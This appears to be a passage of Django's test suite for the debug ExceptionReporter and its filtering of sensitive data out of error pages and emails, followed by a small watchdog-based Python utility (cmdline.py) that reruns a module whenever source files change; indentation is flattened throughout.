self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_eol_support(self):
"""The ExceptionReporter supports Unix, Windows and Macintosh EOL markers"""
LINES = ['print %d' % i for i in range(1, 6)]
reporter = ExceptionReporter(None, None, None, None)
for newline in ['\n', '\r\n', '\r']:
fd, filename = tempfile.mkstemp(text=False)
os.write(fd, (newline.join(LINES) + newline).encode())
os.close(fd)
try:
self.assertEqual(
reporter._get_lines_from_file(filename, 3, 2),
(1, LINES[1:3], LINES[3], LINES[4:])
)
finally:
os.unlink(filename)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">No exception message supplied</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_reporting_of_nested_exceptions(self):
request = self.rf.get('/test_view/')
try:
try:
raise AttributeError(mark_safe('<p>Top level</p>'))
except AttributeError as explicit:
try:
raise ValueError(mark_safe('<p>Second exception</p>')) from explicit
except ValueError:
raise IndexError(mark_safe('<p>Final exception</p>'))
except Exception:
# Custom exception handler, just pass it into ExceptionReporter
exc_type, exc_value, tb = sys.exc_info()
explicit_exc = 'The above exception ({0}) was the direct cause of the following exception:'
implicit_exc = 'During handling of the above exception ({0}), another exception occurred:'
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
# Both messages are twice on page -- one rendered as html,
# one as plain text (for pastebin)
self.assertEqual(2, html.count(explicit_exc.format('<p>Top level</p>')))
self.assertEqual(2, html.count(implicit_exc.format('<p>Second exception</p>')))
self.assertEqual(10, html.count('<p>Final exception</p>'))
text = reporter.get_traceback_text()
self.assertIn(explicit_exc.format('<p>Top level</p>'), text)
self.assertIn(implicit_exc.format('<p>Second exception</p>'), text)
self.assertEqual(3, text.count('<p>Final exception</p>'))
def test_reporting_frames_without_source(self):
try:
source = "def funcName():\n raise Error('Whoops')\nfuncName()"
namespace = {}
code = compile(source, 'generated', 'exec')
exec(code, namespace)
except Exception:
exc_type, exc_value, tb = sys.exc_info()
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
frames = reporter.get_traceback_frames()
last_frame = frames[-1]
self.assertEqual(last_frame['context_line'], '<source code not available>')
self.assertEqual(last_frame['filename'], 'generated')
self.assertEqual(last_frame['function'], 'funcName')
self.assertEqual(last_frame['lineno'], 2)
html = reporter.get_traceback_html()
self.assertIn('generated in funcName', html)
text = reporter.get_traceback_text()
self.assertIn('"generated" in funcName', text)
def test_reporting_frames_for_cyclic_reference(self):
try:
def test_func():
try:
raise RuntimeError('outer') from RuntimeError('inner')
except RuntimeError as exc:
raise exc.__cause__
test_func()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
def generate_traceback_frames(*args, **kwargs):
nonlocal tb_frames
tb_frames = reporter.get_traceback_frames()
tb_frames = None
tb_generator = threading.Thread(target=generate_traceback_frames, daemon=True)
tb_generator.start()
tb_generator.join(timeout=5)
if tb_generator.is_alive():
# tb_generator is a daemon that runs until the main thread/process
# exits. This is resource heavy when running the full test suite.
# Setting the following values to None makes
# reporter.get_traceback_frames() exit early.
exc_value.__traceback__ = exc_value.__context__ = exc_value.__cause__ = None
tb_generator.join()
self.fail('Cyclic reference in Exception Reporter.get_traceback_frames()')
if tb_frames is None:
# can happen if the thread generating traceback got killed
# or exception while generating the traceback
self.fail('Traceback generation failed')
last_frame = tb_frames[-1]
self.assertIn('raise exc.__cause__', last_frame['context_line'])
self.assertEqual(last_frame['filename'], __file__)
self.assertEqual(last_frame['function'], 'test_func')
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">I'm a little teapot</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report</h1>', html)
self.assertIn('<pre class="exception_value">I'm a little teapot</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_non_utf8_values_handling(self):
"Non-UTF-8 exceptions/values should not make the output generation choke."
try:
class NonUtf8Output(Exception):
def __repr__(self):
return b'EXC\xe9EXC'
somevar = b'VAL\xe9VAL' # NOQA
raise NonUtf8Output()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('VAL\\xe9VAL', html)
self.assertIn('EXC\\xe9EXC', html)
def test_local_variable_escaping(self):
"""Safe strings in local variables are escaped."""
try:
local = mark_safe('<p>Local variable</p>')
raise ValueError(local)
except Exception:
exc_type, exc_value, tb = sys.exc_info()
html = ExceptionReporter(None, exc_type, exc_value, tb).get_traceback_html()
self.assertIn('<td class="code"><pre>'<p>Local variable</p>'</pre></td>', html)
def test_unprintable_values_handling(self):
"Unprintable values should not make the output generation choke."
try:
class OomOutput:
def __repr__(self):
raise MemoryError('OOM')
oomvalue = OomOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<td class="code"><pre>Error in formatting', html)
def test_too_large_values_handling(self):
"Large values should not create a large HTML."
large = 256 * 1024
repr_of_str_adds = len(repr(''))
try:
class LargeOutput:
def __repr__(self):
return repr('A' * large)
largevalue = LargeOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertEqual(len(html) // 1024 // 128, 0) # still fit in 128Kb
self.assertIn('<trimmed %d bytes string>' % (large + repr_of_str_adds,), html)
def test_encoding_error(self):
"""
A UnicodeError displays a portion of the problematic string. HTML in
safe strings is escaped.
"""
try:
mark_safe('abcdefghijkl<p>mnὀp</p>qrstuwxyz').encode('ascii')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<h2>Unicode error hint</h2>', html)
self.assertIn('The string that could not be encoded/decoded was: ', html)
            self.assertIn('<strong>&lt;p&gt;mnὀp&lt;/p&gt;</strong>', html)
def test_unfrozen_importlib(self):
"""
importlib is not a frozen app, but its loader thinks it's frozen which
results in an ImportError. Refs #21443.
"""
try:
request = self.rf.get('/test_view/')
importlib.import_module('abc.def.invalid.name')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ModuleNotFoundError at /test_view/</h1>', html)
def test_ignore_traceback_evaluation_exceptions(self):
"""
Don't trip over exceptions generated by crafted objects when
evaluating them while cleansing (#24455).
"""
class BrokenEvaluation(Exception):
pass
def broken_setup():
raise BrokenEvaluation
request = self.rf.get('/test_view/')
broken_lazy = SimpleLazyObject(broken_setup)
try:
bool(broken_lazy)
except BrokenEvaluation:
exc_type, exc_value, tb = sys.exc_info()
self.assertIn(
"BrokenEvaluation",
ExceptionReporter(request, exc_type, exc_value, tb).get_traceback_html(),
"Evaluation exception reason not mentioned in traceback"
)
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertIn("http://evil.com/", html)
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
        value = '<td>items</td><td class="code"><pre>&#x27;Oops&#x27;</pre></td>'
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(
'<td>items</td><td class="code"><pre><InMemoryUploadedFile: '
'items (application/octet-stream)></pre></td>',
html
)
# COOKIES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
        self.assertInHTML('<td>items</td><td class="code"><pre>&#x27;Oops&#x27;</pre></td>', html)
def test_exception_fetching_user(self):
"""
The error page can be rendered if the current user can't be retrieved
(such as when the database is unavailable).
"""
class ExceptionUser:
def __str__(self):
raise Exception()
request = self.rf.get('/test_view/')
request.user = ExceptionUser()
try:
raise ValueError('Oops')
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Oops</pre>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>[unable to retrieve the current user]</p>', html)
text = reporter.get_traceback_text()
self.assertIn('USER: [unable to retrieve the current user]', text)
def test_template_encoding(self):
"""
The templates are loaded directly, not via a template loader, and
should be opened as utf-8 charset as is the default specified on
template engines.
"""
reporter = ExceptionReporter(None, None, None, None)
with mock.patch.object(DebugPath, 'open') as m:
reporter.get_traceback_html()
m.assert_called_once_with(encoding='utf-8')
m.reset_mock()
reporter.get_traceback_text()
m.assert_called_once_with(encoding='utf-8')
class PlainTextReportTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError at /test_view/', text)
self.assertIn("Can't find my keys", text)
self.assertIn('Request Method:', text)
self.assertIn('Request URL:', text)
self.assertIn('USER: jacob', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request information:', text)
self.assertNotIn('Request data not supplied', text)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError', text)
self.assertIn("Can't find my keys", text)
self.assertNotIn('Request Method:', text)
self.assertNotIn('Request URL:', text)
self.assertNotIn('USER:', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request data not supplied', text)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
reporter.get_traceback_text()
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
reporter.get_traceback_text()
@override_settings(DEBUG=True)
def test_template_exception(self):
request = self.rf.get('/test_view/')
try:
render(request, 'debug/template_error.html')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
templ_path = Path(Path(__file__).parent.parent, 'templates', 'debug', 'template_error.html')
self.assertIn(
'Template error:\n'
'In template %(path)s, error at line 2\n'
' \'cycle\' tag requires at least two arguments\n'
' 1 : Template with error:\n'
' 2 : {%% cycle %%} \n'
' 3 : ' % {'path': templ_path},
text
)
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn('items = <InMemoryUploadedFile:', text)
# COOKIES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
reporter.get_traceback_text()
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("http://evil.com/", text)
class ExceptionReportTestMixin:
# Mixin used in the ExceptionReporterFilterTests and
# AjaxResponseExceptionReporterFilter tests below
breakfast_data = {
'sausage-key': 'sausage-value',
'baked-beans-key': 'baked-beans-value',
'hash-brown-key': 'hash-brown-value',
'bacon-key': 'bacon-value',
}
def verify_unsafe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
        Asserts that potentially sensitive info is displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# All variables are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertContains(response, k, status_code=500)
self.assertContains(response, v, status_code=500)
def verify_safe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
        Asserts that certain sensitive info is not displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Non-sensitive variable's name and value are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
# Sensitive variable's name is shown but not its value.
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k in self.breakfast_data:
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# Non-sensitive POST parameters' values are shown.
self.assertContains(response, 'baked-beans-value', status_code=500)
self.assertContains(response, 'hash-brown-value', status_code=500)
# Sensitive POST parameters' values are not shown.
self.assertNotContains(response, 'sausage-value', status_code=500)
self.assertNotContains(response, 'bacon-value', status_code=500)
def verify_paranoid_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that no variables or POST parameters are displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Show variable names but not their values.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertNotContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# No POST parameters' values are shown.
self.assertNotContains(response, v, status_code=500)
def verify_unsafe_email(self, view, check_for_POST_params=True):
"""
        Asserts that potentially sensitive info is displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
# Frames vars are shown in html email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertIn('worcestershire', body_html)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertIn(k, body_plain)
self.assertIn(v, body_plain)
self.assertIn(k, body_html)
self.assertIn(v, body_html)
def verify_safe_email(self, view, check_for_POST_params=True):
"""
        Asserts that certain sensitive info is not displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
# Frames vars are shown in html email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertNotIn('worcestershire', body_html)
if check_for_POST_params:
for k in self.breakfast_data:
# All POST parameters' names are shown.
self.assertIn(k, body_plain)
# Non-sensitive POST parameters' values are shown.
self.assertIn('baked-beans-value', body_plain)
self.assertIn('hash-brown-value', body_plain)
self.assertIn('baked-beans-value', body_html)
self.assertIn('hash-brown-value', body_html)
# Sensitive POST parameters' values are not shown.
self.assertNotIn('sausage-value', body_plain)
self.assertNotIn('bacon-value', body_plain)
self.assertNotIn('sausage-value', body_html)
self.assertNotIn('bacon-value', body_html)
def verify_paranoid_email(self, view):
"""
Asserts that no variables or POST parameters are displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body = str(email.body)
self.assertNotIn('cooked_eggs', body)
self.assertNotIn('scrambled', body)
self.assertNotIn('sauce', body)
self.assertNotIn('worcestershire', body)
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertIn(k, body)
# No POST parameters' values are shown.
self.assertNotIn(v, body)
@override_settings(ROOT_URLCONF='view_tests.urls')
class ExceptionReporterFilterTests(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports (#14614).
"""
rf = RequestFactory()
def test_non_sensitive_request(self):
"""
        Everything (request info and frame variables) can be seen
in the default error reports for non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
def test_sensitive_request(self):
"""
Sensitive POST parameters and frame variables cannot be
seen in the default error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view)
self.verify_unsafe_email(sensitive_view)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view)
self.verify_safe_email(sensitive_view)
def test_paranoid_request(self):
"""
No POST parameters and frame variables can be seen in the
default error reports for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view)
self.verify_unsafe_email(paranoid_view)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view)
self.verify_paranoid_email(paranoid_view)
def test_multivalue_dict_key_error(self):
"""
#21098 -- Sensitive POST parameters cannot be seen in the
        error reports if request.POST['nonexistent_key'] throws an error.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(multivalue_dict_key_error)
self.verify_unsafe_email(multivalue_dict_key_error)
with self.settings(DEBUG=False):
self.verify_safe_response(multivalue_dict_key_error)
self.verify_safe_email(multivalue_dict_key_error)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
def test_sensitive_method(self):
"""
The sensitive_variables decorator works with object methods.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_unsafe_email(sensitive_method_view, check_for_POST_params=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_safe_email(sensitive_method_view, check_for_POST_params=False)
def test_sensitive_function_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as arguments to the decorated
function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_args_function_caller)
self.verify_unsafe_email(sensitive_args_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_args_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_args_function_caller, check_for_POST_params=False)
def test_sensitive_function_keyword_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as keyword arguments to the
decorated function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_kwargs_function_caller)
self.verify_unsafe_email(sensitive_kwargs_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_kwargs_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_kwargs_function_caller, check_for_POST_params=False)
def test_callable_settings(self):
"""
Callable settings should not be evaluated in the debug page (#21345).
"""
def callable_setting():
return "This should not be displayed"
with self.settings(DEBUG=True, FOOBAR=callable_setting):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_callable_settings_forbidding_to_set_attributes(self):
"""
        Callable settings that forbid setting attributes should not break
the debug page (#23070).
"""
class CallableSettingWithSlots:
__slots__ = []
def __call__(self):
return "This should not be displayed"
with self.settings(DEBUG=True, WITH_SLOTS=CallableSettingWithSlots()):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_dict_setting_with_non_str_key(self):
"""
A dict setting containing a non-string key should not break the
debug page (#12744).
"""
with self.settings(DEBUG=True, FOOBAR={42: None}):
response = self.client.get('/raises500/')
self.assertContains(response, 'FOOBAR', status_code=500)
def test_sensitive_settings(self):
"""
The debug page should not show some sensitive settings
(password, secret key, ...).
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
with self.settings(DEBUG=True, **{setting: "should not be displayed"}):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
def test_settings_with_sensitive_keys(self):
"""
The debug page should filter out some sensitive information found in
dict settings.
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
FOOBAR = {
setting: "should not be displayed",
'recursive': {setting: "should not be displayed"},
}
with self.settings(DEBUG=True, FOOBAR=FOOBAR):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
class AjaxResponseExceptionReporterFilter(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports.
Here we specifically test the plain text 500 debug-only error page served
when it has been detected the request was sent by JS code. We don't check
for (non)existence of frames vars in the traceback information section of
the response content because we don't include them in these error pages.
Refs #14614.
"""
rf = RequestFactory(HTTP_X_REQUESTED_WITH='XMLHttpRequest')
def test_non_sensitive_request(self):
"""
        Request info can be seen in the default error reports for
non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
def test_sensitive_request(self):
"""
Sensitive POST parameters cannot be seen in the default
error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view, check_for_vars=False)
def test_paranoid_request(self):
"""
No POST parameters can be seen in the default error reports
for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view, check_for_vars=False)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
@override_settings(DEBUG=True, ROOT_URLCONF='view_tests.urls')
def test_ajax_response_encoding(self):
response = self.client.get('/raises500/', HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(response['Content-Type'], 'text/plain; charset=utf-8')
class HelperFunctionTests(SimpleTestCase):
def test_cleanse_setting_basic(self):
self.assertEqual(cleanse_setting('TEST', 'TEST'), 'TEST')
self.assertEqual(cleanse_setting('PASSWORD', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_ignore_case(self):
self.assertEqual(cleanse_setting('password', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_recurses_in_dictionary(self):
initial = {'login': 'cooper', 'password': 'secret'}
expected = {'login': 'cooper', 'password': CLEANSED_SUBSTITUTE}
self.assertEqual(cleanse_setting('SETTING_NAME', initial), expected)
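# --- Hedged sketch (not from view_tests.views) -----------------------------------
# The views exercised above (sensitive_view, paranoid_view, ...) rely on Django's
# debug decorators. A minimal illustration of the pattern, with made-up locals:
#
#   from django.views.decorators.debug import (
#       sensitive_post_parameters, sensitive_variables,
#   )
#
#   @sensitive_variables('sauce')                            # hide this local's value
#   @sensitive_post_parameters('bacon-key', 'sausage-key')   # hide these POST values
#   def sensitive_view(request):
#       cooked_eggs = 'scrambled'   # name and value still shown when DEBUG=False
#       sauce = 'worcestershire'    # name shown, value replaced by CLEANSED_SUBSTITUTE
#       raise Exception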
|
cmdline.py
|
import os
import sys
import time
import imp
import runpy
import traceback
import argparse
import logging
from multiprocessing import Process
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
def run_module(module, function=None):
    if function is not None:  # load the module from its file path and call the named function
module = os.sep.join(module.split('.'))
pwd = os.getcwd()
module_path = os.path.join(pwd, module)
if os.path.isdir(module_path):
module_path = os.path.join(module_path, '__init__.py')
else:
module_path = "{}.py".format(module_path)
module = imp.load_source('module', module_path)
if hasattr(module, function):
getattr(module, function)()
else:
try:
# Change the sys.path
# https://docs.python.org/3/using/cmdline.html#cmdoption-m
sys.path.insert(0, '.')
runpy.run_module(module, run_name="__main__", alter_sys=True)
# Reference
# https://docs.python.org/2/library/runpy.html
        except Exception:
exec_info = sys.exc_info()
traceback.print_exception(*exec_info)
class ChangeAndRunEventHandler(PatternMatchingEventHandler):
"""docstring for ChangeAndRunEventHandler"""
def __init__(self, module, function=None, patterns=None, ignore_patterns=None,
ignore_directories=False, case_sensitive=False):
super(ChangeAndRunEventHandler, self).__init__(patterns, ignore_patterns,
ignore_directories, case_sensitive)
self.module = module
self.function = function
self.proc = None
self._start_process()
def _start_process(self):
# if previous process is still alive, kill it
if hasattr(self.proc, 'is_alive') and self.proc.is_alive():
sys.stdout.write('terminating')
while self.proc.is_alive():
sys.stdout.write('.')
self.proc.terminate()
time.sleep(0.5)
sys.stdout.write('\n\n\n')
os.system('clear')
# create new process after ensuring that the process has been killed
self.proc = Process(target=run_module, args=(self.module, self.function, ))
self.proc.start()
# https://docs.python.org/3/library/multiprocessing.html
def on_any_event(self, event):
pass
def on_moved(self, event):
pass
def on_created(self, event):
pass
def on_deleted(self, event):
pass
def on_modified(self, event):
self._start_process()
def monitor_module(module, function=None):
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
path = os.getcwd()
event_handler = ChangeAndRunEventHandler(module, function=function, patterns=['*.py'])
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
# observer.join()
except KeyboardInterrupt:
observer.stop()
observer.join()
